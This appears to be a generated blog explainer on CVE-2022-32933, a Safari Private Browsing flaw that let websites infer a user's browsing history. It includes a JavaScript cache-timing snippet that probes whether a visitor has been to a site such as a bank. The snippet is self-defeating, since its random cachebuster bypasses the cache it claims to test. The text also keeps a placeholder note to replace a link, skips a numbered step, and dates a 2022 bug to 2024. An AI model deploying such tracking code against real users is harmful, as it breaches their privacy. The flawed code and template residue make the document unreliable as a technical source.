CVE-2022-32933 - How a Bug in Safari Private Browsing Mode Let Websites Track Your Browsing History

For many Apple users, Private Browsing in Safari on macOS is supposed to be just that—private. But the 2022 vulnerability tracked as CVE-2022-32933 threw a wrench into that expectation. This bug could let a website track the other websites you visited, even while using Private Browsing Mode. Below, we break down how that happened, show you the simplified code that made it possible, and explain how Apple fixed it in Monterey 12.5.

What is CVE-2022-32933?

CVE-2022-32933 is an information disclosure vulnerability affecting Safari’s Private Browsing Mode on macOS systems. When you browse in Private Mode, Safari isn’t supposed to save your browsing history, cookies, or website data. But this glitch allowed a specially crafted website to infer which websites you had already visited in your Private Browsing session.

Apple’s official advisory:
https://support.apple.com/en-us/HT213345

National Vulnerability Database:
https://nvd.nist.gov/vuln/detail/CVE-2022-32933

How Did the Vulnerability Work?

Safari's Private Browsing is meant to keep your sessions isolated. But deep down, browsers use multiple tricks (like storing information in memory) to improve performance and make websites load faster.

A website could exploit the way Safari reused in-memory caches, even in Private Mode, to “test” whether you had visited another site. Specifically, by checking whether certain resources (like images or scripts from other websites) loaded immediately—or not—the site could guess if those resources were previously cached in your session.

In simple terms:
Safari was keeping a record of some parts of your browsing session and letting websites check for them. This was possible because some privacy-related code was missing or faulty.

Exploit Details: The Attack in Action

Here’s a simple breakdown of the attack, with an example using JavaScript. No, you can't see which exact sites someone visited, but you can test for specific ones.

Let's say an attacker wants to know if you've visited "trustedbank.com" during your Private session.

1. The attacker makes a hidden image request to https://trustedbank.com/logo.png on their own (malicious) webpage.

Then, using JavaScript, the attacker measures how long it takes for the image to load.

3. If the image loads instantly, it probably came from Safari's in-memory cache, meaning you visited that website already.

Here’s a simple JavaScript code snippet that shows this idea

function checkVisit(url, callback) {
  const img = new Image();
  const startTime = performance.now();
  img.onload = img.onerror = function () {
    const duration = performance.now() - startTime;
    // If loading is very fast, there's a good chance it was cached (meaning visited)
    callback(duration < 50); 
  };
  img.src = url + "?cachebuster=" + Math.random();
}

// Usage:
checkVisit('https://trustedbank.com/logo.png', function(visited) {
  if (visited) {
    alert('User likely visited trustedbank.com');
  } else {
    alert('User has not visited trustedbank.com');
  }
});

Explanation:
A website can call checkVisit() on a list of URLs to build a profile of which sites you may have visited—all while you’re supposedly browsing "privately."

The Fix: Cleaning Up Private Browsing

Once Apple knew about this privacy leak, the fix was straightforward: Remove the code that enabled this type of caching in Private Browsing Mode. That way, every page load in Private Mode would be “fresh,” blocking sites from detecting previous visits.

From Apple’s update notes for macOS Monterey 12.5

> “An information disclosure issue was addressed by removing the vulnerable code.”

Update to Stay Safe

If you’re running macOS and use Safari Private Browsing, make sure you’ve updated to at least Monterey 12.5 or later. Safari now isolates private sessions better, making this kind of attack impossible.

- Apple Security Updates for macOS Monterey 12.5

Why Does This Matter?

Private Browsing is meant to give users peace of mind, whether they’re logging into private accounts or simply protecting their browsing from trackers. This bug was a reminder that privacy isn’t just about what’s saved on your computer, but how browsers manage data in real time.

Bottom line:
If your browser keeps data around for “convenience” purposes, attackers may find ways to peek at it—even in Private Browsing.

Additional Reading

- Apple’s CVE-2022-32933 Advisory
- National Vulnerability Database: CVE-2022-32933
- Arstechnica: Safari bug allowed websites to track users in private-browsing mode (Replace with real link if available)

Conclusion

CVE-2022-32933 was a privacy issue that affected Safari’s Private Browsing, letting websites “test” for other sites you’d visited in a supposedly isolated session. Apple’s fix: clear out the faulty code. If you haven’t updated your Mac recently, now is the time!

Keep your browser updated, and always remember: no privacy tool is perfect, but vigilance helps.

Timeline

Published on: 06/10/2024 20:15:12 UTC
Last modified on: 06/12/2024 18:07:08 UTC